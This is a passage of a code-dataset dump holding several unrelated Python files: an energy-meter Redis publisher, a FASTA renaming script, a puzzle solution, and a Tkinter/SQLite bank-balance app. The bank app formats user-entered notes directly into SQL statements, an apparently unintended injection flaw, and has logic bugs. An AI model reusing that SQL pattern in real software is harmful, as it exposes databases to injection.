f\"EPOCH:{sysUtils.dts_epoch()}\")\n syspath: str = sysUtils.syspath(self.syspath_channel, pzem_ss)\n arr.insert(3, f\"PATH:{syspath}\")\n buff = \"|\".join(arr)\n # -- -- publish & set -- --\n dtsutc, epoch = sysUtils.dtsutc_epoch()\n _d: {} = {\"#RPT_kWhrs_STATUS\": f\"{dtsutc} | {epoch} | {readStatus.READ_OK}\"\n , \"#RPT_kWhrs\": f\"[{buff[:-1]}]\"\n , \"CHANNEL_TYPE\": CHANNEL\n , \"LAST_READ\": f\"#RPT_kWhrs | {readStatus.READ_OK} | {sysUtils.dts_utc(with_tz=True)}\"\n , self.m_info.red_key: str(self.m_info)}\n # -- -- -- -- -- -- -- --\n if syspath not in self.first_reads:\n self.redops.red.select(redisDBIdx.DB_IDX_READS.value)\n self.redops.red.delete(syspath)\n self.first_reads.append(syspath)\n # -- -- -- -- -- -- -- --\n self.redops.save_meter_data(syspath, _dict=_d)\n self.redops.pub_read_on_sec(\"PZEM\", _buff=f\"({buff[:-1]})\")\n # -- -- -- -- -- -- -- -- -- -- -- --\n except Exception as e:\n logUtils.log_exp(e)\n time.sleep(2.0)\n","repo_name":"ErikOwsiak/omms-edge","sub_path":"core/pzemRedisBot.py","file_name":"pzemRedisBot.py","file_ext":"py","file_size_in_byte":4028,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"1587627835","text":"#/usr/bin/python\n\n#identify open reading frames, start/stop codons\n\n#import glob\nimport os,sys\n#import numpy\n\n#os.chdir(\"C:/Users/mshpak/Desktop/Covid_19/April_15_MSA\")\n\ndef main(file): \n input_filename = file\n\n seq_file = open(input_filename, \"r\")\n new_seq_file = open(input_filename.split(\".\")[0]+\"_new_name_file\", \"w\") #create file with new sequence names\n table_for_dict = open(input_filename.split(\".\")[0]+\"_name_dict_file\", \"w\") #tab-separated table with temporary name and sequence name\n seq_name_dict = {}\n\n allseq = ''\n index_for_dict = 0\n seq_identify = []\n for line in seq_file:\n #line = line.upper()\n #line = line.rstrip('\\n')\n if 'HCOV' in line or '>' in line:\n index_for_dict = index_for_dict + 1\n ind_name = '>seq_' + str(index_for_dict)\n seq_name_dict.update({ind_name: line.rstrip('\\n')})\n new_seq_file.write(ind_name + '\\n')\n table_for_dict.write(ind_name + '\t' + line)\n else:\n new_seq_file.write(line)\n allseq = allseq + line\n\n new_seq_file.close()\n\nif __name__ == \"__main__\":\n\tmain()\n","repo_name":"wonaya/covid_workflow","sub_path":"scripts/Shorten_Sequence_name.py","file_name":"Shorten_Sequence_name.py","file_ext":"py","file_size_in_byte":1137,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"8140973561","text":"import sys\r\ninput = sys.stdin.readline\r\nfrom collections import deque\r\n\r\nN, K = map(int, input().split())\r\nbelt = deque(list(map(int, input().split())))\r\nrobot = [0] * N # N-1위치에서 로봇 내림\r\n\r\nzero_cnt = 0\r\nanswer = 0\r\n\r\nwhile True:\r\n answer += 1\r\n\r\n # [1] 벨트 이동, 로봇 회전 / 로봇 내림\r\n belt.appendleft(belt.pop())\r\n robot = [0] + robot[:-1]\r\n robot[N-1] = 0\r\n\r\n # [2] 로봇여부 판단, 로봇 우측이동\r\n for i in range(N-2, 0, -1):\r\n if robot[i] == 1 and robot[i+1] == 0 and belt[i+1] > 0:\r\n robot[i], robot[i+1] = 0, 1\r\n belt[i+1] -= 1\r\n if belt[i+1] == 0:\r\n zero_cnt += 1\r\n\r\n # [3] 로봇 올리기\r\n if belt[0] > 0:\r\n robot[0] = 1\r\n belt[0] -= 1\r\n if belt[0] == 0:\r\n zero_cnt += 1\r\n\r\n # [4] 0개수 판단\r\n if zero_cnt >= K:\r\n break\r\n\r\nprint(answer)","repo_name":"Semibro/Baekjoon","sub_path":"백준/Gold/20055. 컨베이어 벨트 위의 로봇/컨베이어 벨트 위의 로봇.py","file_name":"컨베이어 벨트 위의 로봇.py","file_ext":"py","file_size_in_byte":918,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"2498163344","text":"from Tkinter import *\nimport sqlite3\nimport time\n\nconn = sqlite3.connect( 'transactions.db' )\nc = conn.cursor()\n\nroot = Tk()\n\n#Initialize the Record table & set initial Amount = 0\nc.execute(\"CREATE TABLE IF NOT EXISTS Record(DateTime TEXT, Amount REAL, Note TEXT, Balance REAL);\")\n\ndef deposit(): \n global newBalance, amount\n #Call convertRaw function\n convertRaw() \n \n #Add deposit value to the current balance and get current time\n amount = float( add.get() ) \n newBalance = amount + currentBalance \n entryTime = time.ctime()\n \n #Call runSql to add a new entry to database\n runSql( \"INSERT INTO Record VALUES( '{0}', '{1}', '{2}', '{3}' )\".format( entryTime, amount, addNote.get(), newBalance ) )\n conn.commit()\n\n # Call showEntries to show updated list of transactions\n showEntries()\n\n cbEntry.delete( 0, END )\n cbEntry.insert( 0, newBalance )\n\n # Clear the deposit entries\n depEntry.delete( 0, END )\n dnEntry.delete( 0, END )\n\n return newBalance, amount\n \n\ndef withdrawl():\n # Call convertRaw to get balance from database\n convertRaw()\n # Setting global variables to 0 before assigning new values\n newBalance = 0\n amount = 0\n # Change amount to negative value and calculate newBalance\n amount = float( minus.get() ) * -1 \n newBalance = amount + currentBalance\n\n entryTime = time.ctime()\n \n #Call runSql to add a new entry to database\n runSql( \"INSERT INTO Record VALUES( '{0}', '{1}', '{2}', '{3}' )\".format( entryTime, amount, minusNote.get(), newBalance ) )\n conn.commit()\n\n showEntries()\n\n cbEntry.delete( 0, END )\n cbEntry.insert( 0, newBalance ) \n \n # Clear the withdrawl entries \n witEntry.delete( 0, END )\n wnEntry.delete( 0, END )\n\n return newBalance, amount\n\n\n# Function to change the memory location retrieved from database into a useful number\ndef convertRaw():\n global currentBalance \n currentBalance = 0\n #Get current balance from database and change it into a useful number\n cb = c.execute( \"SELECT SUM( Amount ) FROM Record\" ) \n rawBalance = [ c.fetchone() ] \n w = str( rawBalance ) \n x = w[ 2 : ( len( w ) - 3 ) ] \n currentBalance = float( x ) \n\n return currentBalance\n\n\n# Function to run sql command and then call showEntries()\ndef runSql( cmd ):\n x = c.execute( cmd )\n conn.commit() \n \n \n# Function to display the database\ndef showEntries():\n global entries\n ptBox.delete( 0, END )\n tranList = c.execute ( \"SELECT DateTime, Amount, Note, Balance FROM Record WHERE Balance != 0 ORDER BY DateTime DESC\" )\n entries = tranList.fetchall()\n for DateTime, Amount, Note, Balance in entries:\n ptBox.insert( END, 'NEW ENTRY', DateTime, Amount, Note, Balance, '----------' )\n\n\nif \"SELECT COUNT(*) FROM Record = 0\":\n c.execute( \"INSERT INTO Record VALUES( null, 0, 'Initialize', 0)\" )\n\n# Function to make GUI window\ndef makeWindow():\n\n global add, minus, addNote, minusNote, ptBox, cbEntry, depEntry, dnEntry, witEntry, wnEntry\n\n win = Toplevel( root )\n win.title( 'Bank Account Balance' )\n\n topFrame = Frame( win )\n topFrame.pack()\n\n #Current Balance Label and Entry\n cbLabel = Label( topFrame, text = 'Your Current Balance Is: ', padx = 3 )\n cbLabel.grid( row = 1, column = 0 )\n\n cbEntry = Entry( topFrame )\n cbEntry.grid( row = 1, column = 1 )\n\n #Button to add to balance, entry for doing it \n depButton = Button( topFrame, text = 'Deposit', command = deposit )\n depButton.grid( row = 2, column = 0, padx = 5, pady = 2 )\n\n add = StringVar()\n depEntry = Entry( topFrame, textvariable = add )\n depEntry.grid( row = 2, column = 1, padx = 2 )\n\n #label and entry for deposit note \n dnLabel = Label( topFrame, text = 'Deposit Note: ', padx = 5 )\n dnLabel.grid( row = 3, column = 0 )\n\n addNote = StringVar()\n dnEntry = Entry( topFrame, textvariable= addNote )\n dnEntry.grid( row = 3, column = 1, padx = 2 )\n\n #Button to withdraw, entry for doing it \n witButton = Button( topFrame, text = 'Withdrawl', command = withdrawl )\n witButton.grid( row = 5, column = 0, padx = 5, pady = 2 )\n\n minus = StringVar()\n witEntry = Entry( topFrame, textvariable = minus )\n witEntry.grid( row = 5, column = 1, padx = 2 )\n\n #label and entry for withdrawl note \n wnLabel = Label( topFrame, text = 'Withdrawl Note: ', padx = 5 )\n wnLabel.grid( row = 6, column = 0 )\n\n minusNote = StringVar()\n wnEntry = Entry( topFrame, textvariable = minusNote )\n wnEntry.grid( row = 6, column = 1, padx = 2 )\n\n\n bottomFrame = Frame( win )\n bottomFrame.pack()\n\n #label and listbox to display past transactions\n ptLabel = Label( bottomFrame, text = 'Past Transactions:', padx = 5, pady = 2 )\n ptLabel.grid( row = 8, column = 0, pady = 2 ) \n\n ptBox = Listbox( bottomFrame, width = 30, height = 12 )\n ptBox.grid( row = 9, column = 0, padx = 2 ) \n \n scrollbar = Scrollbar( bottomFrame, orient = VERTICAL )\n scrollbar.grid( row = 9, column = 1, sticky = NS )\n scrollbar.configure( command = ptBox.yview ) \n\n ptBox.configure( yscrollcommand = scrollbar.set )\n \n return win\n\n\nwin = makeWindow()\nwin.mainloop()","repo_name":"william-stanford/PythonFinalProject","sub_path":"PythonFinalProject/PythonFinalProject.py","file_name":"PythonFinalProject.py","file_ext":"py","file_size_in_byte":5278,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}